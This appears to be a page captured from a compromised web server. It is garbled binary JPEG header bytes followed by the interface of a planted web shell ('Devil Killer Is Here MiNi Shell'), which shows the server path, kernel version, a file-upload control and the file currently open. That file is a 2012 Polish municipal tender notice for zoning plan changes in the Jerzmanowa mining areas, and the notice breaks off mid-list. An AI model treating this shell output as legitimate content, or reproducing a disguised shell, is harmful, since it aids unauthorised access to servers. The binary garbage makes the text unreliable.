JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121108/236045-N-2012.html

<p class="kh_header"><b>Jerzmanowa: Wykonanie projektów zmiany obowiązujących miejscowych planów zagospodarowania przestrzennego dla terenów górniczych na terenie Gminy Jerzmanowa wraz z ujednoliconymi, zalaminowanymi rysunkami barwnymi w skali 1:5000</b><br>
<b>Numer ogłoszenia: 236045 - 2012; data zamieszczenia: 08.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jerzmanowa , ul. Głogowska 7, 67-222 Jerzmanowa, woj. dolnośląskie, tel. 076 8382046, faks 076 8312119.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jerzmanowa.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektów zmiany obowiązujących miejscowych planów zagospodarowania przestrzennego dla terenów górniczych na terenie Gminy Jerzmanowa wraz z ujednoliconymi, zalaminowanymi rysunkami barwnymi w skali 1:5000.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres wykonania przedmiotu zamówienia obejmuje:
1.1 Wykonanie projektu zmiany miejscowego planu zagospodarowania przestrzennego dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach administracyjnych gminy Jerzmanowa (zmiana dotyczy 5 obszarów, o łącznej powierzchni ok. 18ha, wskazanych w Uchwale Rady Gminy Jerzmanowa XXII/172/2012 z dnia 22 sierpnia 2012r.).
1.2 Wykonanie projektu zmiany miejscowego planu zagospodarowania przestrzennego dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach administracyjnych gminy Jerzmanowa (zmiana dotyczy 7 obszarów, o łącznej powierzchni ok. 83ha,  wskazanych w Uchwale Rady Gminy Jerzmanowa XXII/173/2012 z dnia 22 sierpnia 2012r.).
1.3 Wykonanie projektu zmiany miejscowego planu zagospodarowania przestrzennego dla fragmentów terenów górniczych /Sieroszowice I/ i /Rudna I/ oraz pozostałej części gminy nie objętej planem miejscowym dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach Gminy Jerzmanowa (zmiana dotyczy 6 obszarów ,o łącznej powierzchni ok. 34ha,  wskazanych w Uchwale Rady Gminy Jerzmanowa XXII/174/2012 z dnia 22 sierpnia 2012r.). 
1.4 Wykonanie w kolorze, zalaminowanego, ujednoliconego rysunku miejscowego planu zagospodarowania przestrzennego w skali 1:5000 w ilości sztuk 2 obejmującego:
- Rysunek planu miejscowego zatwierdzony Uchwałą Rady Gminy Jerzmanowa Nr XXLII/278/2010 z dnia 19 kwietnia 2010r.,
- Rysunek planu miejscowego dla sieci infrastruktury technicznej zatwierdzony Uchwałą Rady Gminy Jerzmanowa Nr XX/159/2012r. z dnia 18 czerwca 2012r.,
- Rysunek/rysunki uchwalonej przez Radę Gminy Jerzmanowa zmiany planu miejscowego zainicjowanej Uchwałą Rady Gminy Jerzmanowa Nr XXII/174/2012 z dnia 22 sierpnia 2012r. 
1.5 Wykonanie w kolorze, zalaminowanego, ujednoliconego rysunku miejscowego lanu zagospodarowania w skali 1:5000 w ilości sztuk 2,  obejmującego:
- Rysunek planu miejscowego zatwierdzony Uchwałą Rady Gminy Jerzmanowa nr XXLII/276/2010 z dnia 19 kwietnia 2010r.,
- Rysunek planu miejscowego dla sieci infrastruktury technicznej zatwierdzony Uchwałą Rady Gminy Jerzmanowa Nr XX/159/2012r. z dnia 18 czerwca 2012r.,
- Rysunek uchwalonej przez Radę Gminy Jerzmanowa zmiany planu miejscowego zainicjowanej Uchwałą Rady Gminy Jerzmanowa Nr XXII/173/2012 z dnia 22 sierpnia 2012r. 
- Rysunek uchwalonej przez Radę Gminy Jerzmanowa zmiany planu miejscowego zainicjowanej Uchwałą Rady Gminy Jerzmanowa Nr XXII/172/2012 z dnia 22 sierpnia 2012r.

UWAGA: Łączna powierzchnia obszaru obejmowanego w/w planami wynosi ok. 135 ha.

2. Szczegółowy opis przedmiotu zamówienia:

2.1
2.1.1	Wykonanie projektu zmiany miejscowego planu zagospodarowania przestrzennego dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach administracyjnych gminy Jerzmanowa (zmiana dotyczy 5 obszarów, o łącznej powierzchni ok. 18ha, wskazanych w Uchwale Rady Gminy Jerzmanowa XXII/172/2012 z dnia 22 sierpnia 2012r.),
2.1.2	Wykonanie projektu zmiany miejscowego planu zagospodarowania przestrzennego dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach administracyjnych gminy Jerzmanowa (zmiana dotyczy 7 obszarów, o łącznej powierzchni ok. 83ha,  wskazanych w Uchwale Rady Gminy Jerzmanowa XXII/173/2012 z dnia 22 sierpnia 2012r.),
2.1.3	Wykonanie projektu zmiany miejscowego planu zagospodarowania przestrzennego dla fragmentów terenów górniczych /Sieroszowice I/ i /Rudna I/ oraz pozostałej części gminy nie objętej planem miejscowym dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach Gminy Jerzmanowa (zmiana dotyczy 6 obszarów ,o łącznej powierzchni ok. 34ha,  wskazanych w Uchwale Rady Gminy Jerzmanowa XXII/174/2012 z dnia 22 sierpnia 2012r.),
2.1.4	Wykonanie w kolorze, zalaminowanego, ujednoliconego rysunku miejscowego planu zagospodarowania przestrzennego  w skali 1:5000 w ilości sztuk 2,  obejmującego:
- Rysunek planu miejscowego zatwierdzony Uchwałą Rady Gminy Jerzmanowa Nr XXLII/278/2010 z dnia 19 kwietnia 2010r.,
- Rysunek planu miejscowego dla sieci infrastruktury technicznej zatwierdzony Uchwałą Rady Gminy Jerzmanowa Nr XX/159/2012r. z dnia 18 czerwca 2012r.,
- Rysunek/rysunki uchwalonej przez Radę Gminy Jerzmanowa zmiany planu miejscowego zainicjowanej Uchwałą Rady Gminy Jerzmanowa Nr XXII/174/2012 z dnia 22 sierpnia 2012r. 
- Zamawiający przekaże Wykonawcy brakujące materiały do wykonania ujednoliconych rysunków planu miejscowego, w postaci zgeoreferowanych plików .mxd i .shp. zapisanych w środowisku ArcGiS 9.3.(w wersji kolorowej). 
2.1.5	Wykonanie w kolorze, zalaminowanego, ujednoliconego rysunku miejscowego planu zagospodarowania przestrzennego w skali 1:5000 w ilości sztuk 2 obejmującego:
- Rysunek planu miejscowego zatwierdzony Uchwałą Rady Gminy Jerzmanowa nr XXLII/276/2010 z dnia 19 kwietnia 2010r.,
- Rysunek planu miejscowego dla sieci infrastruktury technicznej zatwierdzony Uchwałą Rady Gminy Jerzmanowa Nr XX/159/2012r. z dnia 18 czerwca 2012r.,
- Rysunek uchwalonej przez Radę Gminy Jerzmanowa zmiany planu miejscowego zainicjowanej Uchwałą Rady Gminy Jerzmanowa Nr XXII/173/2012 z dnia 22 sierpnia 2012r. 
- Rysunek uchwalonej przez Radę Gminy Jerzmanowa zmiany planu miejscowego zainicjowanej Uchwałą Rady Gminy Jerzmanowa Nr XXII/172/2012 z dnia 22 sierpnia 2012r.,
- Zamawiający przekaże Wykonawcy brakujące materiały do wykonania ujednoliconych rysunków planu miejscowego, w postaci zgeoreferowanych plików .mxd i .shp. zapisanych w środowisku ArcGiS 9.3. (w wersji kolorowej),
2.2	Przy wykonywaniu planów o których mowa w pkt 3.1 ppkt 3.1.1,3.1.2 i 3.1.3 Wykonawca zobowiązany jest do:
2.2.1	pozyskania urzędowych kopii map zasadniczych, w odpowiedniej skali, gromadzonych w państwowym zasobie geodezyjnym i kartograficznym z przeznaczeniem do celów planistycznych zgodnie z art. 16 ust. 1 ustawy o planowaniu i zagospodarowaniu przestrzennym, 
2.2.2	rozpoznania stopnia dostępności materiałów koniecznych do realizacji zamówienia w urzędach i instytucjach dysponujących tymi materiałami, w takim celu aby posiadał niezbędną wiedzą do wykonania opracowania,
2.2.3	uwzględnienia w opracowaniu wymagań, zawartych w obowiązujących w tym zakresie przepisów prawa, w tym w szczególności wynikających z:
- ustawy z dnia  27 marca  2003r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz.U.2012.647) 
- Rozporządzeniem Ministra  Infrastruktury z dnia 26 sierpnia 2003r w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U.2003.164.1587),
- ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opieki nad zabytkami (Dz.U.2003.162.1568 ze zm.), 
- ustawy z dnia 16 kwietnia 2004r. o ochronie przyrody (t.j. Dz.U.2009.151.1220 ze zm.), 
- ustawy z dnia 18 lipca 2001r. Prawo wodne (t.j. Dz.U.2012.145), 
- ustawy z dnia 27 kwietnia 2001r. Prawo ochrony środowiska (Dz.U.2008.25.150 ze zm.) 
- ustawy z dnia 3 lutego 1995r. o ochronie gruntów rolnych i leśnych (t.j. Dz.U.2004.121.1266 ze zm.),
- ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U.2008.199.1227 ze zm.)
- ustawy z dnia 9 czerwca 2011r. Prawo geologiczne i górnicze (Dz.U.2011.163.981 ze zm.)
- innych nie wymienionych wyżej przepisów prawa,
2.2.4	określenia w opracowaniu wymagań wynikających z art. 15 ust. 2 i 3 ustawy o planowaniu i zagospodarowaniu przestrzennym,
2.2.5	wykonania projektów zmiany planów zgodnie z wymaganiami określonymi w § 3 rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego,
2.2.6	wykonania w imieniu Wójta Gminy, za jego pośrednictwem i w uzgodnieniu z nim, zadań wynikających z art. 17 pkt 1 do 14 ustawy o planowaniu i zagospodarowaniu przestrzennym z zastrzeżeniem, że wszystkie projekty pism i ogłoszeń przygotowuje Wykonawca a firmuje i podpisuje Wójt Gminy,
2.2.7	ścisłej współpracy z Zamawiającym przy wykonaniu przedmiotu zamówienia do czasu opublikowania planów miejscowych w Dzienniku Urzędowym Województwa Dolnośląskiego, w tym do wzięcia czynnego udziału w dyskusji publicznej dotyczącej planów miejscowych oraz udziału w innych spotkaniach wyznaczonych przez Wójta Gminy Jerzmanowa a dotyczących planów miejscowych,
2.2.8	wprowadzenia zakresu i rodzaju zmian do planów miejscowych wynikających z uzasadnienia do uchwał Nr XXII/172/2012, Nr XXII/173/2012, Nr XXII/174/2012 Rady Gminy Jerzmanowa z dnia 22 sierpnia 2012r. oraz z wniosków jakie zostaną złożone do planów miejscowych przez osoby fizyczne i instytucje.
2.3	Wykonawca zobowiązuje się do przekazania Zamawiającemu: 
2.3.1	w terminie nie później niż do 2 tygodni, przed planowanym podjęciem przez Radę Gminy Jerzmanowa odpowiedniej uchwały w sprawie uchwalenia zmiany planu miejscowego, które są przedmiotem niniejszego zamówienia, ostatecznego tekstu planu miejscowego w formacie *zipx lub *lapx.
2.3.2	w terminie do 2 tygodni, przed planowanym podjęciem przez Radę Gminy Jerzmanowa odpowiedniej uchwały w sprawie uchwalenia planu miejscowego, które są przedmiotem niniejszego zamówienia, pełnej dokumentacji planistycznej powstałej w procesie sporządzania przedmiotowej procedury planistycznej w 2 egzemplarzach, 
2.3.3	przygotowanie procedur planistycznych Wykonawca wykona zgodnie z wymogami § 12 Rozporządzenia Ministra  Infrastruktury z dnia 26 sierpnia 2003r w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U.2003.164.1587),
2.3.4	materiałów końcowych w sposób i w postaci określonej w /Programach Pracy/ w ust. 4.5 załącznika nr 1, 2 i 3 do umowy.

2.4	Zamawiający przekaże Wykonawcy:
2.4.1	na cele niezbędne do wykonania projektów zmiany, o których mowa w ust 1 pkt 1, 2, 3, opracowanie ekofizjograficzne Gminy Jerzmanowa oraz inne dokumenty jakie posiada w swoich zasobach Zamawiający w wersji elektronicznej, pozostałe dokumenty i opracowania niezbędne do realizacji zamówienia Wykonawca opracowuje na swój koszt,
2.4.2	w dniu podpisania umowy, po 1 egzemplarzu następujących dokumentów i opracowań z zakresu planowania przestrzennego odnoszących się do obszaru objętego zmianą:
- Uchwała Rady Gminy Jerzmanowa Nr XLII/276/2010 z dnia 19 kwietnia 2010 roku w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach administracyjnych gminy Jerzmanowa, 
- Uchwała Rady Gminy Jerzmanowa Nr XLII/278/2010 z dnia 19 kwietnia 2010 roku w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego dla fragmentów terenów górniczych /Sieroszowice I/ i /Rudna I/ oraz pozostałej części gminy nie objętej planem miejscowym dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach Gminy Jerzmanowa,
- Uchwałę Nr XXII/172/2012 Rady Gminy Jerzmanowa z dnia 22 sierpnia 2012r.  w sprawie, przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach administracyjnych gminy Jerzmanowa wraz z załącznikami graficznymi stanowiącymi jej integralną część,
- Uchwałę Nr XXII/173/2012 Rady Gminy Jerzmanowa z dnia 22 sierpnia 2012r.  w sprawie, przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach administracyjnych gminy Jerzmanowa wraz z załącznikami graficznymi stanowiącymi jej integralną część,
- Uchwałę Nr XXII/174/2012 Rady Gminy Jerzmanowa z dnia 22 sierpnia 2012r. w sprawie, przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego dla fragmentów terenów górniczych /Sieroszowice I/ i /Rudna I/ oraz pozostałej części gminy nie objętej planem miejscowym dla terenu górniczego /Głogów Głęboki-Przemysłowy/ w granicach Gminy Jerzmanowa, wraz z załącznikami graficznymi stanowiącymi jej integralną część.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 19.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium wnosi się przed upływem składania ofert, tj. do dnia 19.11.2012r. do godz. 8:30.
2. Wysokość wadium Zamawiający ustalił w kwocie  2 000,00 zł. (słownie: dwa tysiące złotych  00/100).
3. Wadium może być wnoszone w formie przewidzianej w art.45 ust.6 ustawy Pzp.  
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Urzędu Gminy Jerzmanowa 48 8646 0008 0000 0600 1906 0006 Bank Spółdzielczy w Jerzmanowej. Wniesienie wadium w terminie oznacza uznanie kwoty na rachunku bankowym do dnia 19.11.2012r. do godz. 8:30.
5. W przypadku, gdy Wykonawca wybrał wadium, w formie innej niż pieniądz, do oferty należy dołączyć kopię dokumentu. Oryginał dokumentu Wykonawca dostarcza w kopercie w wyznaczonym terminie tj. do dnia 19.11.2012r. do godz. 8:30 do pokoju nr 3 w Urzędzie Gminy Jerzmanowa, ul. Głogowska 7, 67-222 Jerzmanowa. 
6. Jeżeli Wykonawca wnosi wadium w formie gwarancji, to z treści gwarancji powinno wynikać bezwarunkowe i nieodwołalne, na pisemne żądanie zgłoszone przez Zamawiającego w okresie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp. 
7. Treść gwarancji wadialnej musi zawierać następujące elementy:
7.1 nazwa i adres Zamawiającego;
7.2 określenie przedmiotu zamówienia;
7.3 nazwę i adres Wykonawcy. 
8. Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego, pod warunkiem, iż odwołanie zostało ostatecznie rozstrzygnięte lub upłynął termin do wnoszenia</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełnienia warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą i udokumentują, że wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 3 opublikowane miejscowe plany zagospodarowania przestrzennego lub ich zmiany, w tym co najmniej 1 dla terenów górniczych utworzonych dla wydobywania kopalin metodą podziemną. Powierzchnia każdego opublikowanego  miejscowego planu zagospodarowania przestrzennego lub ich zmiany  powinna wynosić minimum 100 ha.
UWAGA: Definicja /terenu górniczego utworzonego dla wydobywania kopalin metodą podziemną/ w rozumieniu ustawy Prawo geologiczne i górnicze z dn. 9 czerwca 2011r. (Dz.U.2011.163.981 ze zm.)

2. Opis sposobu dokonywania oceny spełniania warunków:
2.1 Zamawiający dokonana oceny spełnienia przez Wykonawcę warunków udziału w postępowaniu na podstawie załączonych przez Wykonawcę do oferty oświadczeń i dokumentów wymienionych w rozdz. VII ust 1 SIWZ, z treści których będą wynikać informacje potwierdzające spełnianie warunków.
2.2 Ocena będzie dokonywana wg metody spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełnienia warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują osobami posiadającymi niezbędne kwalifikacje, legitymujący się uprawnieniami stosownie do art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (t.j. Dz.U.2012.647), jednocześnie  w zespole mającym wykonywać zamówienie muszą znajdować się następujące osoby spełniające wymagania :
1.1	Warunek 1: główny projektant zespołu mającego wykonywać zamówienie musi być członkiem właściwej okręgowej izby urbanistów oraz posiadać minimum 3-letnie doświadczenie w wykonywaniu miejscowych planów zagospodarowania przestrzennego lub ich zmian, w tym również dla terenów górniczych utworzonych dla wydobywania kopalin metodą podziemną - o minimalnej powierzchni powyżej 100 ha każdy.
1.2	Warunek 2: minimum dwóch dodatkowych projektantów wpisanych na listę właściwej okręgowej izby urbanistów, posiadających doświadczenie w wykonywaniu miejscowych planów zagospodarowania przestrzennego lub ich zmian, w tym również dla terenów górniczych utworzonych dla wydobywania kopalin metodą podziemną - o minimalnej powierzchni powyżej 100 ha każdy.
2. Opis sposobu dokonywania oceny spełniania warunków:
2.1 Zamawiający dokonana oceny spełnienia przez Wykonawcę warunków udziału w postępowaniu na podstawie załączonych przez Wykonawcę do oferty oświadczeń i dokumentów wymienionych w rozdz. VII ust 1 SIWZ, z treści których będą wynikać informacje potwierdzające spełnianie warunków.
2.2 Ocena będzie dokonywana wg metody spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełnienia warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

